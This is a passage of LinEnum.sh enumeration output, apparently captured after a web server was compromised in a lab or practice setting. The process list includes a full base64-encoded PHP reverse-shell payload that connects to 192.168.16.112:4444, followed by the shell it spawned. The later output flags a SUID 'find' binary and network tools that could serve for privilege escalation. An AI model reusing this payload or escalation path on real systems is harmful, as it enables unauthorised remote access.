 981 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 982 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 983 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 984 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 985 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 986 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 987 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 988 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 989 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 990 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 991 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 992 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 993 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 994 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 995 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 996 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 997 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 998 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 999 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
1000 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
1001 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
1002 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
1003 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
1004 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
1005 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
1006 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
1007 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
1008 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
1009 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
1010 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
1011 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
1012 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
1013 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
1014 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
1015 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
1016 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
1017 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
1018 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
1019 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
1020 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
1021 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
1022 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
1023 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
1024 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
1025 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
1026 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
1027 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
1028 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
1029 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
1030 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
1031 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
1032 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
1033 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
1034 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
1035 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
1036 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
1037 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
1038 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
1039 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
1040 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
1041 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
1042 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
1043 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
1044 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
1045 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
1046 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
1047 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
1048 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
1049 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
1050 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
1051 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
1052 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1053 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1054 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
1055 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1056 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
1057 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
1058 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
1059 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
1060 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
1061 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
1062 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
1063 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
1064 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
1065 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
1066 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
1067 root      3298  0.0  0.2   5196  2356 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
1068 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
1069 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
1070 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1071 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1072 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1073 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1074 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1075 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1076 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
1077 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
1078 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
1079 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
1080 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
1081 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
1082 www-data  4398  0.0  0.2   3824  2088 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1083 www-data  4857  0.0  0.1   3876  1696 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1084 www-data  4858  0.0  0.0   1876   448 ?        S    01:08   0:00 tee -a
1085 www-data  5028  0.0  0.1   3860  1416 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1086 www-data  5029  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
1087 
1088 
1089 [00;31m[-] Process binaries and associated permissions (from above list):[00m
1090 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
1091 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
1092 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
1093 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
1094 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
1095 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
1096 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
1097 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
1098 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
1099 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
1100 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
1101 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
1102 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
1103 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
1104 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
1105 
1106 
1107 [00;31m[-] /etc/init.d/ binary permissions:[00m
1108 total 280
1109 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
1110 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1111 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
1112 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
1113 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
1114 -rw-r--r--  1 root root 2427 Oct 16  2012 README
1115 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
1116 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
1117 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
1118 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
1119 -rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
1120 -rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
1121 -rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
1122 -rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
1123 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
1124 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
1125 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
1126 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
1127 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
1128 -rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
1129 -rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
1130 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
1131 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
1132 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
1133 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
1134 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
1135 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
1136 -rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
1137 -rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
1138 -rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
1139 -rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
1140 -rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
1141 -rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
1142 -rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
1143 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
1144 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
1145 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
1146 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
1147 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
1148 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
1149 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
1150 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
1151 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
1152 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
1153 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
1154 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
1155 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
1156 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
1157 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
1158 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
1159 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
1160 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
1161 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
1162 -rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
1163 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
1164 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
1165 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
1166 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
1167 
1168 
1169 [00;31m[-] /etc/init/ config file permissions:[00m
1170 total 48
1171 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
1172 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
1173 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
1174 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
1175 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
1176 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
1177 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
1178 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
1179 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
1180 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
1181 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
1182 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
1183 
1184 
1185 [00;31m[-] /lib/systemd/* config file permissions:[00m
1186 /lib/systemd/:
1187 total 4.0K
1188 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
1189 
1190 /lib/systemd/system:
1191 total 56K
1192 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
1193 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
1194 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
1195 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
1196 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
1197 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
1198 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
1199 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
1200 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
1201 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
1202 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
1203 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
1204 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
1205 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
1206 
1207 /lib/systemd/system/dbus.target.wants:
1208 total 0
1209 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1210 
1211 /lib/systemd/system/multi-user.target.wants:
1212 total 0
1213 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
1214 
1215 /lib/systemd/system/sockets.target.wants:
1216 total 0
1217 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
1218 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
1219 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
1220 
1221 /lib/systemd/system/basic.target.wants:
1222 total 0
1223 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
1224 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
1225 
1226 
1227 [00;33m### SOFTWARE #############################################[00m
1228 [00;31m[-] MYSQL version:[00m
1229 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
1230 
1231 
1232 [00;31m[-] Apache user configuration:[00m
1233 APACHE_RUN_USER=www-data
1234 APACHE_RUN_GROUP=www-data
1235 
1236 
1237 [00;33m### INTERESTING FILES ####################################[00m
1238 [00;31m[-] Useful file locations:[00m
1239 /bin/nc
1240 /bin/netcat
1241 /usr/bin/wget
1242 /usr/bin/gcc
1243 /usr/bin/curl
1244 
1245 
1246 [00;31m[-] Installed compilers:[00m
1247 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
1248 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
1249 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
1250 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
1251 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
1252 
1253 
1254 [00;31m[-] Can we read/write sensitive files:[00m
1255 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
1256 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
1257 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
1258 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
1259 
1260 
1261 [00;31m[-] SUID files:[00m
1262 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
1263 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
1264 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
1265 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
1266 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
1267 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1268 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
1269 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
1270 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
1271 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
1272 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
1273 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1274 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1275 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
1276 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
1277 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
1278 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
1279 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1280 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
1281 
1282 
1283 [00;33m[+] Possibly interesting SUID files:[00m
1284 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
1285 
1286 
1287 [00;31m[-] SGID files:[00m
1288 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
1289 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
1290 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
1291 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
1292 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
1293 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
1294 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
1295 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
1296 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
1297 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
1298 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
1299 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
1300 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
1301 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
1302 
1303 
1304 [-] Can't search *.conf files as no keyword was entered
1305 
1306 [-] Can't search *.php files as no keyword was entered
1307 
1308 [-] Can't search *.log files as no keyword was entered
1309 
1310 [-] Can't search *.ini files as no keyword was entered
1311 
1312 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
1313 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
1314 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
1315 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
1316 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
1317 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
1318 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
